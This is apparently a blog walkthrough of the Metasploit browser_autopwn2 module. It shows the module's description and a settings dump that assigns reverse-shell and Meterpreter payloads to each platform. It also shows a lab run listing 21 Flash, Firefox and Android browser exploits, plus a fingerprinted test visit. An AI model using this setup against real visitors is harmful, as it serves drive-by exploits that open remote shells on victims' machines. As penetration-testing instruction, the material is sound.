metasploit - browser_autopwn2
谯志诚
Thanks msf committer. Please read here for more details about browser_autopwn2.
msf auxiliary(browser_autopwn2) > info
Name: HTTP Client Automatic Exploiter 2 (Browser Autopwn)
Module: auxiliary/server/browser_autopwn2
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2015-07-05
Provided by:
sinn3r <sinn3r@metasploit.com>
Available actions:
Name Description
---- -----------
WebServer Start a bunch of modules and direct clients to appropriate exploits
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXCLUDE_PATTERN no Pattern search to exclude specific modules
INCLUDE_PATTERN no Pattern search to include specific modules
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH /welcome no The URI to use for this exploit (default is random)
Description:
This module will automatically serve browser exploits. Here are the
options you can configure: The Include option allows you to specify
the kind of exploits to be loaded. For example, if you wish to load
just Adobe Flash exploits, then you can set Include to
'adobe_flash'. The Exclude option will ignore exploits. For example,
if you don't want any Adobe Flash exploits, you can set this. Also
note that the Exclude option will always be evaludated after the
Include option. The MaxExploits option specifies the max number of
exploits to load by Browser Autopwn. By default, 20 will be loaded.
But note that the client will probably not be vulnerable to all 20
of them, so only some will actually be served to the client. The
Content option allows you to provide a basic webpage. This is what
the user behind the vulnerable browser will see. You can simply set
a string, or you can do the file:// syntax to load an HTML file.
Note this option might break exploits so try to keep it as simple as
possible. The WhiteList option can be used to avoid visitors that
are outside the scope of your pentest engagement. IPs that are not
on the list will not be attacked. The MaxSessions option is used to
limit how many sessions Browser Autopwn is allowed to get. The
default -1 means unlimited. Combining this with other options such
as RealList and Custom404, you can get information about which
visitors (IPs) clicked on your malicious link, what exploits they
might be vulnerable to, redirect them to your own internal training
website without actually attacking them. The RealList is an option
that will list what exploits the client might be vulnerable to based
on basic browser information. If possible, you can run the exploits
for validation. For more information about Browser Autopwn, please
see the reference link.
References:
https://community.rapid7.com/community/metasploit/blog/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2msf auxiliary(browser_autopwn2) > set
Global
======
No entries in data store.
Module: server/browser_autopwn2
===============================
Name Value
---- -----
CUSTOM404 https://www.exploit-db.com/
CookieName __ua
ExploitReloadTimeout 3000
HTML::base64 none
HTML::javascript::escape 0
HTML::unicode none
HTMLContent hello world
HTTP::chunked false
HTTP::compression none
HTTP::header_folding false
HTTP::junk_headers false
HTTP::server_name Apache
InitialAutoRunScript migrate -f
JsObfuscate 0
LHOST 192.168.1.108
MaxExploitCount 21
MaxSessionCount -1
PAYLOAD_ANDROID android/meterpreter/reverse_tcp
PAYLOAD_ANDROID_LPORT 4443
PAYLOAD_FIREFOX firefox/shell_reverse_tcp
PAYLOAD_FIREFOX_LPORT 4442
PAYLOAD_GENERIC generic/shell_reverse_tcp
PAYLOAD_GENERIC_LPORT 4459
PAYLOAD_JAVA java/meterpreter/reverse_tcp
PAYLOAD_JAVA_LPORT 4448
PAYLOAD_LINUX linux/x86/meterpreter/reverse_tcp
PAYLOAD_LINUX_LPORT 4445
PAYLOAD_OSX osx/x86/shell_reverse_tcp
PAYLOAD_OSX_LPORT 4447
PAYLOAD_UNIX cmd/unix/reverse
PAYLOAD_UNIX_LPORT 4446
PAYLOAD_WIN windows/meterpreter/reverse_tcp
PAYLOAD_WIN_LPORT 4444
Retries true
SRVHOST 0.0.0.0
SRVPORT 8080
SSL false
SSLCompression false
ShowExploitList true
TCP::max_send_size 0
TCP::send_delay 0
URIPATH /welcome
VERBOSE truemsf auxiliary(browser_autopwn2) > show options
Module options (auxiliary/server/browser_autopwn2):
Name Current Setting Required Description
---- --------------- -------- -----------
EXCLUDE_PATTERN no Pattern search to exclude specific modules
INCLUDE_PATTERN no Pattern search to include specific modules
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH /welcome no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer Start a bunch of modules and direct clients to appropriate exploits
msf auxiliary(browser_autopwn2) > run
[*] Auxiliary module execution completed
[*] Searching BES exploits, please wait...
msf auxiliary(browser_autopwn2) > [*] Starting exploit modules...
msf auxiliary(browser_autopwn2) >
[*] Starting listeners...
[*] Time spent: 9.462520245
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Using URL: http://0.0.0.0:8080/welcome
[*] Local IP: http://192.168.1.108:8080/welcome
[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.
Exploits
========
Order Rank Name Path Payload
----- ---- ---- ---- -------
1 Excellent firefox_webidl_injection /gmLTYN firefox/shell_reverse_tcp on 4442
2 Excellent firefox_tostring_console_injection /JEmVuiQaKIrw firefox/shell_reverse_tcp on 4442
3 Excellent firefox_svg_plugin /obmUrBMlx firefox/shell_reverse_tcp on 4442
4 Excellent firefox_proto_crmfrequest /KmenmjQhUhnT firefox/shell_reverse_tcp on 4442
5 Excellent webview_addjavascriptinterface /TgUj android/meterpreter/reverse_tcp on 4443
6 Excellent samsung_knox_smdm_url /RKbn android/meterpreter/reverse_tcp on 4443
7 Great adobe_flash_shader_drawing_fill /BMAAabhunvx windows/meterpreter/reverse_tcp on 4444
8 Great adobe_flash_opaque_background_uaf /GBwNOaqCYlFW windows/meterpreter/reverse_tcp on 4444
9 Great adobe_flash_nellymoser_bof /NZVMFwLZMLgbr windows/meterpreter/reverse_tcp on 4444
10 Great adobe_flash_hacking_team_uaf /MIfAzyPrpkm windows/meterpreter/reverse_tcp on 4444
11 Great adobe_flash_worker_byte_array_uaf /YvafdTNG windows/meterpreter/reverse_tcp on 4444
12 Great adobe_flash_domain_memory_uaf /WpEdowncDoshx windows/meterpreter/reverse_tcp on 4444
13 Great adobe_flash_copy_pixels_to_byte_array /IrnNHy windows/meterpreter/reverse_tcp on 4444
14 Great adobe_flash_casi32_int_overflow /ExycSI windows/meterpreter/reverse_tcp on 4444
15 Great adobe_flash_uncompress_zlib_uaf /bPjzBO windows/meterpreter/reverse_tcp on 4444
16 Great adobe_flash_shader_job_overflow /uoDtKDBidW windows/meterpreter/reverse_tcp on 4444
17 Great adobe_flash_pixel_bender_bof /rZclWjWFPbnD windows/meterpreter/reverse_tcp on 4444
18 Great adobe_flash_net_connection_confusion /KfTKxIbCnv windows/meterpreter/reverse_tcp on 4444
19 Good wellintech_kingscada_kxclientdownload /OFwAxIJNjLyV windows/meterpreter/reverse_tcp on 4444
20 Good ms14_064_ole_code_execution /OUcjis windows/meterpreter/reverse_tcp on 4444
21 Good adobe_flash_uncompress_zlib_uninitialized /VPZdapAQVLH windows/meterpreter/reverse_tcp on 4444
[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://192.168.1.108:8080/welcome
[*] Server started.
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - No cookie received, resorting to headers hash.
[*] 192.168.1.108 browser_autopwn2 - Gathering target information.
[*] 192.168.1.108 browser_autopwn2 - Sending HTML response.
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - Info receiver page called.
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - Received cookie 'WkrwqI'.
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - Received sniffed browser data over POST:
192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - {"os_name"=>["Linux"], "os_vendor"=>["undefined"], "os_device"=>["undefined"], "ua_name"=>["Firefox"], "ua_ver"=>["35.0"], "arch"=>["x86_64"], "java"=>["null"], "silverlight"=>["false"], "flash"=>["null"], "vuln_test"=>["true"]}.
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - Received cookie 'WkrwqI'.
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - Serving exploit to user with tag WkrwqI
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - Setting target "WkrwqI" to :tried.
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - Received cookie 'WkrwqI'.
[*] 192.168.1.108 browser_autopwn2 - User 192.168.1.108 (Tag: WkrwqI) visited our malicious link, but no exploits found suitable.
[*] 192.168.1.108 browser_autopwn2 - No suitable exploits to send.
REFERENCES
https://community.rapid7.com/community/metasploit/blog/2015/07/15/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter–part-1
https://community.rapid7.com/community/metasploit/blog/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter–part-2
类似资料: